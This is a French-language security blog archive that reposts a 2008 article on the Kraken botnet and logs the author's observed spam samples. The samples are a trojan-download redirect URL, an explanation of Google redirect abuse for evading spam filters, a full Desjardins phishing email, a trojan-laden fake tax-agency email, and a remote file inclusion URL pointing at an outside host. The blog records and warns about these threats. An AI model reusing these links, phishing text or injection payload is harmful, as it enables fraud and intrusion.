Archive for the ‘Virus\spam\malware’ Category:
New Massive Botnet Twice the Size of Storm…
400,000-strong ‘Kraken’ botnet has infiltrated 50 Fortune 500 companies — and now usurps Storm as world’s biggest botnet
APRIL 7, 2008 | 8:00AMBy Kelly Jackson Higgins
Senior Editor, Dark Reading
SAN FRANCISCO -– RSA 2007 Conference –- A new botnet twice the size of Storm has ballooned to an army of over 400,000 bots, including machines in the Fortune 500, according to botnet researchers at Damballa. (See The World’s Biggest Botnets and MayDay! Sneakier, More Powerful Botnet on the Loose.)
The so-called Kraken botnet has been spotted in at least 50 Fortune 500 companies and is undetectable in over 80 percent of machines running antivirus software. Kraken appears to be evading detection by a combination of clever obfuscation techniques, including regularly updating its binary code and structuring the code in such a way that hinders any static analysis, says Paul Royal, principal researcher at Damballa.
“It’s easy to trace but slow to get antivirus coverage. It seems to imply [the creators] have a good understanding of how AV tools operate and how to evade them,” Royal says.
Kraken’s successful infiltration of major enterprises is a wakeup call that bots aren’t just a consumer problem. Damballa and other botnet experts over the past few months have seen an unsettling rise in bot infections in enterprises. (See Bots Rise in the Enterprise.)
Royal says like Storm, Kraken so far is mostly being used for spamming the usual scams — high interest loans, gambling, male enhancement products, pharmacy advertisements, and counterfeit watches, for instance. “But given that it updates its binary, there’s no reason it couldn’t update itself to a binary that does other things,” Royal says. “I’m wondering where this thing is going to go.”
Read more »
Et c’est au tour de Yahoo….
Un lien menant a un beau petit EXE, contenant : trojandownloader.tiny.ndf.trojan .
Le email avais le très peux subtil titre : NEW Crazy Britney Video!
Y’a vraiment encore du monde qui tombe pour ce genre de titre ? Quoi qu’il en soit, l’anti-spam de google l’a pas détecter… J’ai l’impression que ce email et les autres (Via google) sont des ballon d’essais…
Le lien menne vers : http://rds.yahoo.com/_ylt=A0geu8TpN6tHvZgAE1lXNyoA/
SIG=11iv33oc2/EXP=1202489705/**http%3a//alphainvest.ru/play.exe
Spambots Can Now Fool Yahoo CAPTCHA Tests: Yes, Worry
C’est de plus en plus compliqué de se protéger des bots ….
Source : Gizmodo.com
Nouvelle tendance dans le SPAM.
Je suis le seul a recevoir des SPAM contenant des lien vers google ? En fait je crois que c’est les lien de redirection de l’engin de recherche de google, remarqué, sa devrais être facile a éliminé, mais pour l’instant sa passe pas mal bien dans tout les anti-spam que j’utilise :-(, je vais me faire des filter custom pour l’instant, du genre :
Si le email contien “http://google.com//search?hl
L’url en tant que tel est construit de cette manière : http://google.com//search?hl
La variable &btnI=8OGgGTh est celle qui déclanche la redirection, sans cette variable, l’url donne une simple recherche. Pour l’instant il semble que la variable, ne soit pas lier a l’url (Dans cette exemple www.pure-chaos.org), je sais pas si cette variable contien un identifiant, ou encore une expiration, ce blob semble au hazard.
Encore un exemple ou les Spammer profite de “Faille” dans le systeme, celle ci est “majeur”, puisque de cette manière tu peux cacher l’url dans l’url d’un site connue, et par le fait même contourné beaucoup d’anti-spam.
A suivre .
Disclaimer : Par nouvelle tendance, je veux dire que j’avais jamais vue ça sur aucun de mes systeme, et que j’en ai pas entendu parler ailleur, donc si vous avez des info ou URL sur cette tendance, share it !!!
Nouvelle vague de Phishing AccèsD .
Reçu dans quelque une de mes adresse Honeypot, pas la meilleur version jamais vue, mais y’a probablement quelque personne qui vont se faire prendre .
–ATTENTION UTILISÉ LES LIEN DANS CE POST A VOS RISQUE –
Cher(e) membre
Desjardins/ AccèsD,Chez
Desjardins , notre mission
est de vous offrir jour après jours, un service de qualité
exceptionnelle et d’assurer votre sécurité. Nous équipe du Département
de confiance et de sécurité veille à chaque heure du jour a maintenir la
fiabilité de notre réseau de sorte que chacun de nos membres autant les
particuliers que notre clientèle Affaires puissent effectuer leurs
transactions bancaires en toute sécurité.Lors d’une récente mise-à-niveau de sécurité,
selon les informations recueillies, nos dossiers indiquent que vous avez
atteint la limite règlementaire permise concernant l’authentification de
votre compte AccèsD , desSolutions en ligne de Desjardins. Conformément aux normes de
sécurité de l’entreprise, le but de cet avis est pour vous indiquer
qu’afin de pourvoir maintenir votre compte
AccèsD actif et de pouvoir continuer à effectuer vos
opérations, il est impératif de vous authentifier a celui-ci avant la
date limite vous étant indiquée pus bas, le cas échéant nous devrons
désactiver votre compte pour une période indéterminée pour votre
sécurité.La date limite pour vous authentifier est:
Vendredi, le 30/11/2007.Sans plus tarder veuillez cliquer sur le lien
hypertexte ci bas afin de vous rendre en toute sécurité sur notre page
sécurisée afin de vous authentifier en prévenant ainsi toute situation
inconfortable.
https://accesd.desjardins.com/Nous vous remercions d’avoir pris ces quelques
minutes de participer à cette importante mesure de sécurité. Vous
contribuez à ce que le service AccèsD
des Solutions en ligne de Desjardins demeure un endroit sûr ou
vous pouvez gérer vos économies ou les finances de votre entreprise dans
le confort de votre foyer. De toute l’équipe deDesjardins: Merci de nous faire confiance car
votre sécurité est notre priorité.Département de Confiance et de sécurité
Mouvement des caisses Desjardins.
Desjardins / AccèsD
Svp ne répondez pas à ce courriel car c’est seulement un avis. Le
courrier envoyé à cette adresse ne peut pas être répondu.
Copyright © 2007 Mouvement des caisses Desjardins. Tous droits
réservés.
Phishing Spam élaboré.
Voici une tentative de Phishing assé élaboré, reçu au bureau… Pour mettre le tout en contexte, la personne l’ayant reçu, est la personne responsable de ce genre de truc . Les nom et adresse on été changé ….
L’adresse étais également presque valide, puisque c’étais l’adresse de l’an passé, et comme on sais que les changement d’adresse sont pose souvent problème, s’aurrais pus être plausible
Attn: ***** Nom Changer ***** ,
*** NOM ***
**** Adresse + # de Téléphone ****
This is an automated email that confirms the registration of your complaint case number : #57274 filed by Patterson Butler on October 31/2007 concerning Online Identity Theft.
While Canada Revenue Agency does not resolve individual consumer problems, your complaint helps us investigate fraud, and can lead to law enforcement action.
You can download a copy of your complaint from changer.pdf .Please print and keep this copy for your personal records.
We use secure socket layer (SSL) encryption to protect the transmission of the information you submit to us when you use our secure online forms. The information you provided to us is stored securely.
The form you used to register this complaint is designed to improve public access to the Canada Revenue Agency of Consumer Protection Consumer Response Center, and is voluntary. Through this form, consumers may electronically register a complaint with the Canada Revenue Agency.Under the Paperwork Reduction Act, as amended, an agency may not conduct or sponsor, and a person is not required to respond to, a collection of information unless it displays a currently valid OMB control number.
Our staff will keep you updated regarding the status of our investigation.To check the status of your complaint please access changer.pdf .The information in this news release was obtained from the court records.
Further information on convictions can also be found in the Media room on the CRA website at www.cra.gc.ca/convictions.
Le PDF dans le message, est un Trojan : Win32/Spy.Pachat.A trojan
Remote File Inclusion Galore #3
Même chose que le précédant, mais avec une légère modification de l’URL, probablement pour utilisé une autre faille.
http://www.pure-chaos.org/index.php?file=Gallery&op=classe&orderby
=http%3A%2F%2Fda.bluebananas.net%2Fville%2Fimages%2Ftuno%2Fmibufat%2F
http://da.bluebananas.net/ville/images/tuno/mibufat/
